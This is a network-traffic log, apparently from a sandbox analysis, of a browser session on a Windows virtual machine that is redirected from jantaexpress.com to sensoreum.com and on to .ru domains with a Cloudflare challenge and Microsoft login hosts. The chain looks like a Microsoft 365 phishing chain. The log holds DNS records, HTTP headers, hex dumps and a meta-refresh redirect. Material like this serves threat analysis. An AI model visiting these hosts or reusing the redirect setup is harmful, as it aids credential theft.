                                                                              Jan 20, 2025 14:17:45.209528923 CET1.1.1.1192.168.2.60x4646No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.209528923 CET1.1.1.1192.168.2.60x4646No error (0)home-office365-com.b-0004.b-msedge.netb-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.209528923 CET1.1.1.1192.168.2.60x4646No error (0)b-0004.b-msedge.net13.107.6.156A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.245537996 CET1.1.1.1192.168.2.60xd0ecNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:45.245537996 CET1.1.1.1192.168.2.60xd0ecNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354465961 CET1.1.1.1192.168.2.60x41f6No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354465961 CET1.1.1.1192.168.2.60x41f6No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354465961 CET1.1.1.1192.168.2.60x41f6No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354465961 CET1.1.1.1192.168.2.60x41f6No error (0)e329293.dscd.akamaiedge.net2.23.227.214A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354465961 CET1.1.1.1192.168.2.60x41f6No error (0)e329293.dscd.akamaiedge.net2.23.227.223A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354669094 CET1.1.1.1192.168.2.60x2dfaNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354669094 CET1.1.1.1192.168.2.60x2dfaNo error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:17:46.354669094 CET1.1.1.1192.168.2.60x2dfaNo error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.159.0A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.159.73A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.159.68A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.31.71A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.159.64A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.31.73A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net20.190.159.71A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.532330036 CET1.1.1.1192.168.2.60xbfdeNo error (0)www.tm.ak.prd.aadg.trafficmanager.net40.126.31.69A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.533147097 CET1.1.1.1192.168.2.60x31bcNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.533147097 CET1.1.1.1192.168.2.60x31bcNo error (0)login.mso.msidentity.comak.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:01.533147097 CET1.1.1.1192.168.2.60x31bcNo error (0)ak.privatelink.msidentity.comwww.tm.ak.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.980537891 CET1.1.1.1192.168.2.60xa767No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.980537891 CET1.1.1.1192.168.2.60xa767No error (0)nel.measure.office.net.edgesuite.neta1894.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.983309031 CET1.1.1.1192.168.2.60x9cacNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.983309031 CET1.1.1.1192.168.2.60x9cacNo error (0)nel.measure.office.net.edgesuite.neta1894.dscb.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.983309031 CET1.1.1.1192.168.2.60x9cacNo error (0)a1894.dscb.akamai.net2.19.126.146A (IP address)IN (0x0001)false
                                                                              Jan 20, 2025 14:18:29.983309031 CET1.1.1.1192.168.2.60x9cacNo error (0)a1894.dscb.akamai.net2.19.126.143A (IP address)IN (0x0001)false
                                                                              • jantaexpress.com
                                                                              • sensoreum.com
                                                                                • hbv.julfolusi.ru
                                                                              • https:
                                                                                • challenges.cloudflare.com
                                                                                • code.jquery.com
                                                                                • cdnjs.cloudflare.com
                                                                                • pjg7rj2rbflmg2afmlvnhwuzrlb9bbturgzumukxwolcl9nb8ttspiii.dbetarlp.ru
                                                                                • www.office.com
                                                                              • a.nel.cloudflare.com
                                                                              • login.microsoftonline.com
                                                                              • identity.nel.measure.office.net
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.64977366.63.187.232806468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 20, 2025 14:17:22.929285049 CET460OUTGET / HTTP/1.1
                                                                              Host: sensoreum.com
                                                                              Connection: keep-alive
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: f9c8d8e55=d8e5539e31d8
                                                                              Jan 20, 2025 14:17:24.190402985 CET473INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Jan 2025 13:17:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              X-Powered-By: PHP/7.2.30
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 31 30 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 92 bd 6e c3 20 14 46 e7 f0 14 2e 8b a7 84 8e 91 83 3d c4 a9 d4 a5 6a 07 2f ed 12 51 fb da a6 02 e3 c2 25 ad df be a4 34 91 a5 2a 92 a7 0b e8 7c e7 f2 c7 ef 0e cf 65 f5 fa f2 90 f4 a8 55 41 f8 a5 80 68 0a b2 e2 28 51 41 c1 59 ac 84 ac 08 d7 80 22 d0 38 ae e1 d3 cb 53 4e 4b 33 20 0c b8 ae a6 11 68 52 c7 59 4e 11 be 91 9d 75 bb a4 ee 85 75 80 b9 c7 76 bd a5 c5 9f 63 10 1a 02 f6 25 11 c1 66 b5 b0 cd 2c ed bc d6 c2 4e 47 25 6c 07 47 a9 45 07 d7 e0 68 cd 08 16 a7 9c 9a 2e fb dd d9 2c 48 d9 7f ec d2 63 09 1b 94 0d b8 da ca 11 a5 19 16 8a 97 27 82 3e 1e 66 86 dd f6 de 44 67 f7 9f 5a 68 2d b8 3e bd 62 e9 fd 2e f1 56 e5 67 c8 65 8c 3d ee 4f 9b 0f af 5a a3 bc 93 1b eb 59 f9 b6 7d 3a 54 ae 64 69 f0 b1 f8 d6 fc dd 34 53 41 92 b0 10 47 9c c5 bf f0 03 44 08 90 f4 23 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 10cn F.=j/Q%4*|eUAh(QAY"8SNK3 hRYNuuvc%f,NG%lGEh.,Hc'>fDgZh->b.Vge=OZY}:Tdi4SAGD#0
                                                                              Jan 20, 2025 14:17:24.260536909 CET402OUTGET /favicon.ico HTTP/1.1
                                                                              Host: sensoreum.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Referer: http://sensoreum.com/
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: f9c8d8e55=d8e5539e31d8
                                                                              Jan 20, 2025 14:17:24.880728006 CET339INHTTP/1.1 404 Not Found
                                                                              Server: openresty
                                                                              Date: Mon, 20 Jan 2025 13:17:24 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e bf 0a c2 30 10 c6 77 c1 77 38 1f 20 44 a1 63 c8 22 0a 0e ba f8 04 a9 77 36 81 34 57 ae 71 c8 db 9b 6a 0b e2 ec e8 74 dc f7 e7 c7 67 7c ee a3 5d af 8c 27 87 d6 e4 90 23 d9 66 db c0 85 33 1c f9 91 d0 e8 b7 68 f4 2b 52 a3 2d 63 99 ee 8d 52 26 b1 c6 ef be 1b 55 31 7a b6 27 76 0d cd 1f 0f 94 84 c6 5c 3e 7d bd 10 f5 b2 66 a3 14 38 18 1c 62 48 1d 64 06 0c a3 6b 23 c1 f9 7a 3a 80 4b 08 7b 2f dc 13 dc 25 50 c2 58 80 44 58 6a a3 23 50 ea 8f f8 35 e2 09 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: a90ww8 Dc"w64Wqjtg|]'#f3h+R-cR&U1z'v\>}f8bHdk#z:K{/%PXDXj#P5(0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.64977466.63.187.232806468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 20, 2025 14:17:33.592268944 CET212INHTTP/1.0 408 Request Time-out
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Type: text/html
                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>
                                                                              Jan 20, 2025 14:18:18.597721100 CET6OUTData Raw: 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              0192.168.2.64970940.113.110.67443
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:13 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 32 73 59 31 63 77 6b 78 55 4f 36 50 66 58 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 39 64 66 33 63 39 36 36 35 30 31 38 64 32 0d 0a 0d 0a
                                                                              Data Ascii: CNT 1 CON 305MS-CV: K2sY1cwkxUO6PfXZ.1Context: 3d9df3c9665018d2
                                                                              2025-01-20 13:17:13 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                              2025-01-20 13:17:13 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4b 32 73 59 31 63 77 6b 78 55 4f 36 50 66 58 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 39 64 66 33 63 39 36 36 35 30 31 38 64 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 68 53 5a 7a 46 39 48 51 53 69 41 5a 75 45 6a 45 4c 48 38 44 48 74 69 76 42 5a 55 4f 66 6c 61 2b 2f 6a 6f 6e 43 76 61 77 43 76 4e 62 4e 76 7a 72 4b 33 56 70 2f 7a 6c 7a 41 43 58 78 44 48 4f 63 50 2f 68 4b 6a 73 30 39 32 65 54 62 37 53 79 53 30 71 51 56 53 38 43 78 52 75 66 74 5a 4e 36 78 76 30 5a 4a 31 63 43 39 44 33 72 6c
                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: K2sY1cwkxUO6PfXZ.2Context: 3d9df3c9665018d2<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAXhSZzF9HQSiAZuEjELH8DHtivBZUOfla+/jonCvawCvNbNvzrK3Vp/zlzACXxDHOcP/hKjs092eTb7SyS0qQVS8CxRuftZN6xv0ZJ1cC9D3rl
                                                                              2025-01-20 13:17:13 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 32 73 59 31 63 77 6b 78 55 4f 36 50 66 58 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 39 64 66 33 63 39 36 36 35 30 31 38 64 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: K2sY1cwkxUO6PfXZ.3Context: 3d9df3c9665018d2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                              2025-01-20 13:17:13 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                              Data Ascii: 202 1 CON 58
                                                                              2025-01-20 13:17:13 UTC58INData Raw: 4d 53 2d 43 56 3a 20 72 42 2f 6a 42 5a 77 78 47 55 69 79 63 66 75 4a 5a 69 38 2b 55 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                              Data Ascii: MS-CV: rB/jBZwxGUiycfuJZi8+Ug.0Payload parsing failed.


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.64974783.217.208.104436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:20 UTC666OUTGET /UyRV4rC HTTP/1.1
                                                                              Host: jantaexpress.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:20 UTC262INHTTP/1.1 200 OK
                                                                              Alt-Svc: h3=":443"; ma=2592000
                                                                              Cache-Control: no-cache, private
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Mon, 20 Jan 2025 13:17:20 GMT
                                                                              Server: Caddy
                                                                              Server: nginx
                                                                              Vary: Accept-Encoding
                                                                              Connection: close
                                                                              Transfer-Encoding: chunked
                                                                              2025-01-20 13:17:20 UTC877INData Raw: 33 36 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 73 65 6e 73 6f 72 65
                                                                              Data Ascii: 366<!DOCTYPE html><html><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="referrer" content="no-referrer"/> <meta http-equiv="refresh" content="0; URL=https://sensore
                                                                              2025-01-20 13:17:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.64974883.217.208.104436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:20 UTC552OUTGET /favicon.ico HTTP/1.1
                                                                              Host: jantaexpress.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.64975983.217.208.104436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:21 UTC552OUTGET /favicon.ico HTTP/1.1
                                                                              Host: jantaexpress.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.64976166.63.187.2324436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:21 UTC642OUTGET / HTTP/1.1
                                                                              Host: sensoreum.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:22 UTC218INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Mon, 20 Jan 2025 13:17:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1054
                                                                              Connection: close
                                                                              Set-Cookie: f9c8d8e55=d8e5539e31d8
                                                                              X-Powered-By: PHP/7.2.30
                                                                              2025-01-20 13:17:22 UTC1054INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e
                                                                              Data Ascii: <!DOCTYPE html><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="twitter:card" content="summary_large_image"><meta property="og:title" content=""/><meta property="twitter:title" content=""/>


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              5192.168.2.64976740.113.110.67443
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 36 62 46 51 45 33 74 77 43 6b 47 58 44 59 61 42 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 36 64 62 39 38 32 37 66 66 61 30 34 65 38 63 0d 0a 0d 0a
                                                                              Data Ascii: CNT 1 CON 305MS-CV: 6bFQE3twCkGXDYaB.1Context: c6db9827ffa04e8c
                                                                              2025-01-20 13:17:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
